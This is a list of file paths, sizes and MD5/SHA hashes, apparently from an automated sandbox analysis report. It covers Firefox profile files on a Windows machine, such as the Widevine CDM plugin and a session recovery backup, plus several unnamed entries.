SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
7KB
MD54e3c63f41e2f733322d0092e24be8c6f
SHA109babc35152a5210a7f8ad5b8e2107daafbc8b46
SHA256312f76e9392af4c0616f7f17fbcc0c8eec10a0b2805e81dccfcb90b0634d8a6f
SHA51239557b43858234087ee6a3f145e4cc55209ee533709077003ce4d9fe709d58a1d19ef21b98e1ece39fbe924600f0bf2e11c7daf6c3293846a0abe98be06e6eef
-
Filesize
6KB
MD59f29e70398ef2fc1b1bfdc40b8863f2d
SHA1834e65eef6c86ba08c98f3b7d4ec363c4462dad6
SHA256dd5502ef3d395d95a0899c3dbdd02a9a6f787597b5b5d81a9b66f312a438b3db
SHA512e77d461d237ef55b52664ca9320384efb5d641f2a8f3cceb7b70264a36b52ddbec359325725460fd9ed2ab7c0c829c2ac157d27ff451c89c2377780b10c76e0d
-
Filesize
7KB
MD544897475f4213ac9bf92ad9d0a317772
SHA16dfe3e96df845762c9e20efd5596e1ae0eaeaa79
SHA25681f48b4f5112b9416568eae0e4f99a9d9a146cbd54592675d6e6fb23f234536b
SHA512b06f2253199794a6ceddf5850e7d93a995342dfceebb97b60d00baa0cd1be5fff8a703760dee975c52e4ddee2d22bfdb834f5d3bf9eec311d7173d3191b0a24d
-
Filesize
6KB
MD5a3bcc4b96702afe4215eb5728431b53c
SHA1c25689062ec97bf932d41ec932780463b0c1ee2d
SHA2560cd8d490b547cb99ca8d8ee5ed8421da0c0b75278e7c2f8e518614d329b425a8
SHA512b75f5223721be99358083d23b17a7472a987a77a94d93460d3598d6b9c049763fa699a53f2fc8edefbaaad23396c26feffffc7f95970172cfbfc89d3ea8a120e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD55ae0538ba565afdcae62bfe4523bfee9
SHA1476fa675e205eb3723d929d4b07d497f7e0bb0d2
SHA256360324ced057930c703549567b11b805fbf50791f3f6097cfdd1de4c6de4f1bd
SHA512411e7c7328514a5900678b985f6de70f143f1b8cf63ce4f99a2086cee9d9919bef6ccce441ea42f49d27f34af4dc862fec182dbcac5089c03a4f37d1e71e4b09
-
Filesize
1.8MB
MD58c46fe8eee484e73651be335c8ee5e84
SHA19d9b074b985584f45cb6c7a620970dc6a599fb72
SHA2568863fb5e08bc5fe36263d7e0c34f14aa6102526a891a972ee2dc0ac5f6708619
SHA512e2ccec1c15c1d380000afacb0d0755aa25fb2964bfc62d0317f66271dd10964f4f3a02158878da794b99d18c2649b83a0b38387114962becd776234f39e289d3
-
Filesize
925KB
MD562d09f076e6e0240548c2f837536a46a
SHA126bdbc63af8abae9a8fb6ec0913a307ef6614cf2
SHA2561300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49
SHA51232de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f
-
Filesize
63KB
MD5b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA2566e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab